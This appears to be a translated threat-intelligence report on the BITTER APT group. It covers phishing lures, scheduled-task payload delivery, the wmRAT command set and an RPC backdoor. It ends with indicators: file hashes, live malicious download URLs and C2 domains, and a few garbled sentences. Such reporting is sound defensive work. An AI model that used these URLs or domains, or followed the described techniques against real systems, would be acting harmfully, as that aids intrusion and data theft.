Group Background
The BITTER group, also known as APT-C-08, and T-APT-17, is an advanced persistent threat (APT) group that is said to have a South Asian background. The group has been active since November 2013 and mainly focuses on Pakistan and China. Its attack targets mainly include government departments, power industry, and military industry-related units, with the intention of stealing sensitive information. QiAnXin’s internal tracking number is APT-Q-37.
Until 2016, the foreign security manufacturer Forcepoint disclosed the existence of the Manlinghua organization for the first time [1] , which had not been discovered before. Forcepoint named it "BITTER" based on the network communication headers of the remote access tool (RAT) used by the group. In the same year, QiAnXin Threat Intelligence Center discovered a related attack in China and named it "Manlinghua".
Since being exposed, the organization has modified the data packet structure and no longer uses "BITTER" as the identifier of the data packet. At this point, Manlinghua has officially surfaced. As its attack activities continue to be discovered and disclosed, the full picture of BITTER becomes increasingly clear.
The organization has a strong political background and mainly targets Pakistan and China. In 2018, its activities against Saudi Arabia were also discovered [2]. Its attacks targeted government departments, electric power, and military industry-related units with the intention of stealing sensitive information. In 2019 This year also intensified attacks on China’s import and export.
Interestingly, multiple reports have pointed out that there are thousands of connections between the Manlinghua organization and multiple attack groups suspected to be from a country in South Asia, including Patchwork , Patchwork, Donot, etc. Inextricably linked. This shows the complex network connections of the BITTER group in South Asia.
Overview
The RedDrip Team of QiAnXin Threat Intelligence Center has been tracking major APT group around the world. When tracking related APT group in South Asia, we found that the BITTER group has been very active recently. The content of this article is only a review of the past period. Let’s share the attack methods of the BITTER group , reveal its attack methods, goals and motivations, and provide effective security suggestions for relevant organizations.
Since the publication of the article ""Operation Magichm" briefly discusses the CHM file delivery and follow-up operations of the Manlinghua organization " [3] in March 2021 , the Manlinghua organization has been resting on its laurels, delivering malicious chm files through spear phishing emails. Tried and tested, the picture below shows the entire attack process when disclosed in the previous article.
This year, BITTER still delivers malicious compressed packages through spear phishing emails. The compressed packages usually contain malicious chm files, and sometimes contain vulnerable office files inside the compressed packages. The entire attack flow chart is as follows:
It can be found that BITTER is still good at using chm files to create planned tasks to obtain follow-up, and subsequent msi files are selectively issued, and the msi file is usually equipped with BITTER's latest attack weapon wmRAT. This attack The weapon was only disclosed in the past two years and has been continuously expanded and updated. It now supports more than ten remote control commands.
Some of the decoy emails we captured during our threat hunting process look like this:
Compressed packages usually contain malicious chm files.
Of course, sometimes there are xlsx files that carry vulnerabilities.
Exploiting known formula editor vulnerabilities to create scheduled tasks and download subsequent msi files.
In addition, we also discovered a new way for Manlinghua to use PowerPoint mouse click events to create scheduled tasks.
MSI file
The scheduled tasks created by Manlinghua usually request C2 once every 15 to 20 minutes to download the subsequent payload. The computer name and user name are usually included in the request, which will create a folder for the victim in the background. Upload the msi file to the specified victim directory through FTP [4].
Recently , we observed that BITTER dropped two similar msi Trojans. The captured sample information is as follows:
| - | - |
|---|---|
| MD5 | Type |
| d7c3e044df73127776a5bd4cd031de30 | Microsoft Installer(MSI) |
| 19db308f6e83593824cc912aad18e3b4 | Microsoft Installer(MSI) |
Among them, after d7c3e044df73127776a5bd4cd031de30 is executed using the system msiexec.exe , the latest version of wmRAT will be released and executed in the Local directory. Using 7zip , you can see that wmRAT is packaged in it.
19db308f6e83593824cc912aad18e3b4 releases the files.cab in the %temp% directory , and then decompresses the file, which contains the white program MSOutlookServices.exe and the malicious file OLMAPI32.dll. Similarly, using 7zip, you can see that it is packaged in an msi file.
Sample analysis
wmRAT
BITTER's wmRAT was first disclosed in 2022. At the time of disclosure, there were only 16 remote control commands , and half of the commands had no actual functions. This shows that the BITTER group is actively developing the remote control Trojan.
The wmRAT captured this time adds network connectivity sniffing.
In addition, the number of remote control instructions has been increased to 22 , but some instructions without actual functions are also retained.
Some of the remote control instructions it executes are shown in the following table:
| - | - |
|---|---|
| instruction | Function |
| 5 | Send screenshot data to server |
| 6 | receive file data |
| 8 | Receive information from the server, search for the specified file, process it and send it to the server |
| 10 | Open the specified URL and obtain the file |
| 11 | Find files in the specified directory and perform operations |
| 13 | Search for files in the specified directory and send file information to the server |
| 15 | Get information to upload, including computer name, user name, disk usage, etc. |
| 16 | Use powershell to execute commands, create pipelines to obtain data, etc. |
| 20 | Close the specified file stream |
| 21 | Write data to the specified file stream |
| 23 | Open the specified file stream and transfer data to the server |
| 26 | Send file data to the remote server and calculate the sending progress |
Backdoor
The msi sample was captured by us from BITTER's infrastructure officedocuments.info and was named msos.msi when downloaded. It uses the white and black loading mechanism to bypass the monitoring of anti-virus software.
It uses the Microsoft-signed Outlook conflict description related program cnfnot32.exe as a white program to load the malicious OLMAPI32.dll.
OLMAPI32.dll is different from conventional Trojans in that it uses RPC to interact with the server. In addition, this Trojan has been analyzed in detail by a friend recently. Here we will only make some supplements and will not conduct a detailed analysis.
The information it collects includes the following:
- Host Name
- OS Name
- OS Version
- OS Build Type
- Registered Owner
- RegisteredOrganization
- Product ID
- Install Date
- System Manufacturer
- System Model
- System type
- Processor(s)
- BiosVersion
- BIOSVENDOR
- BIOS Date
- Boot Device
- System Locale
- Input Locale
- Time zone
- TotalPhysicalMemory
- AvailablePhysicalMemory
- Virtual Memory: Max Size
- Virtual Memory: Available
- Virtual Memory: In Use
- PageFileLocation
- Domain
Create scheduled tasks for persistence
Use RPC for communication, the communication port is port 443
The remote control commands it supports are as follows:
| - | - |
|---|---|
| instruction | Function |
| ID _ | Identify the victim |
| INF | Upload collected information |
| DN _ | download |
| RUN | Execute specified file |
| DLY | hibernate |
| CMD | Execute remote command |
Traceability Connection
By performing a homologous search in the sample library, we found samples from the same batch as the above-mentioned Back door . The sample size, structure, creation time, etc. are all consistent. The only difference is that C2 has changed.
| - | - |
|---|---|
| MD5 | C2 |
| 09a9e1b03f7d7de4340bc5f9e656b798 | msdata.ddns.net |
| 893060bff7da03f5555ecc9931d0c700 | outlook-updates.ddns.net |
| a6ee959ce128421317f8d97f9f312c78 | msoutllook.ddns.net |
Summary
Through tracking, it was found that the BITTER group has been very rampant in recent activities. It established a foothold through social engineering and is good at using planned tasks to obtain subsequent payloads. It is worth mentioning that it uses victim information to establish corresponding directories, and will only issue subsequent payloads to interested victims, effectively blocking the analysis of most researchers. This is why the malicious chm file of the BITTER group was hunted. Accessing its infrastructure, the root cause of the msi file downloaded back is always 0 kb. In addition, the BITTER group is also trying to update its weapon arsenal and use new Trojans to gain more revenue.
Responding to attacks by APT group is a complex and arduous task that requires organizations and individuals to take comprehensive cybersecurity measures, including strengthening network defenses, regular vulnerability patching, personnel training to identify threats, the use of advanced security tools and continuous monitoring, etc. .
Protection Suggestions
QiAnXin Threat Intelligence Center reminds users to beware of phishing attacks. Do not open links from unknown sources shared on social media, do not click to execute email attachments from unknown sources, do not run unknown files with exaggerated titles, and do not install apps from informal sources. Back up important files in a timely manner and update and install patches.
If you need to run and install applications from unknown sources, you can first identify them through the QiAnXin Threat Intelligence File In-depth Analysis Platform (https://sandbox.ti.qianxin.com/sandbox/page). Currently, it supports in-depth analysis of files in multiple formats including Windows and Android platforms.
Currently, the full range of products based on the threat intelligence data of QiAnXin Threat Intelligence Center, including QiAnXin Threat Intelligence Platform ( TIP), Tianqing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, QiAnXin Situational Awareness, etc., all support the Accurate detection of such attacks.
Part IOCs
MD5
5c3c496869eab67c5742d522f9b35743
2fb6ffb8bd8861943893127d2956749b
9081f304fa2cc059a501e27aed2b31eb
e19dda58beebac867b334fe6bb3f9853
aa3fdb9b07a6dd926a7d5d4f9ce2a824
513b13ec23c08becdde6befb2cba0de7
86b57b0ec360f45331fc5e4eb5c99611
9cee927ab9dbfcee1105f6164d4c517e
95968f3597d61251724f22a6bbeb3dd7
a4c3fa2f91090cff7eb3933ec1442200
47bf243e41009b660a4610c84af835e9
485b6e2bef303251789827d7829e3a3e
ba068724f569d98d56fcfb473449c8df
067d2b13cd93a3c202f601f399926ae2
4ed5d896869949b42e55fcb579e2c689
8b15c4a11df2deea9ad4699ece085a6f
cce89f4956a5c8b1bec82b21e371645b
edcd2d0c8e43f48c853788cf32f78653
1b0748d7ed0bbfbdaa039c2cd0bd2d8e
79a0285313c1f0f4b6369c4a0469244d
515be466eca3c803be66e40c3a84f778
c3e0e2dda8485e56bfcf26b36ada4da5
5c2c1a1fe951591402c36c1a5a240612
f7d293e1ef4181cfb08c9e0a81795eba
a7e8d75eae4f1cb343745d9dd394a154
5df9468112e21c712474483793537aed
a6ee959ce128421317f8d97f9f312c78
893060bff7da03f5555ecc9931d0c700
09a9e1b03f7d7de4340bc5f9e656b798
URL
http://officedocuments.info/live/msos.msi
https://bluelotus.mail-gdrive.com/Services.msi
C2
deriksystemspartens.com
daveonenewtestpanel.com
novasapothecary.com
farleysmxpph.com
folkmusicstreams.com
xiuxonlinehost.com
vsetmediasvc.com
uxmesysconsole.com
grounpackcluepik.com
devqrytoprar.net
erswuniconsharing.com
outlook-services.ddns.net
msoutllook.ddns.net
outlook-updates.ddns.net
msdata.ddns.net
bluelotus.mail-gdrive.com
officedocuments.info
Reference links
[1]. https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan
[2]. https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/
[3]. https://ti.qianxin.com/blog/articles/%22operation-magichm%22:CHM-file-release-and-subsequent-operation-of-BITTER-organization/
[4]. https://ti.qianxin.com/blog/articles/operation-tejas-a-dead-elephant-curled-up-in-the-kunlun-mountains/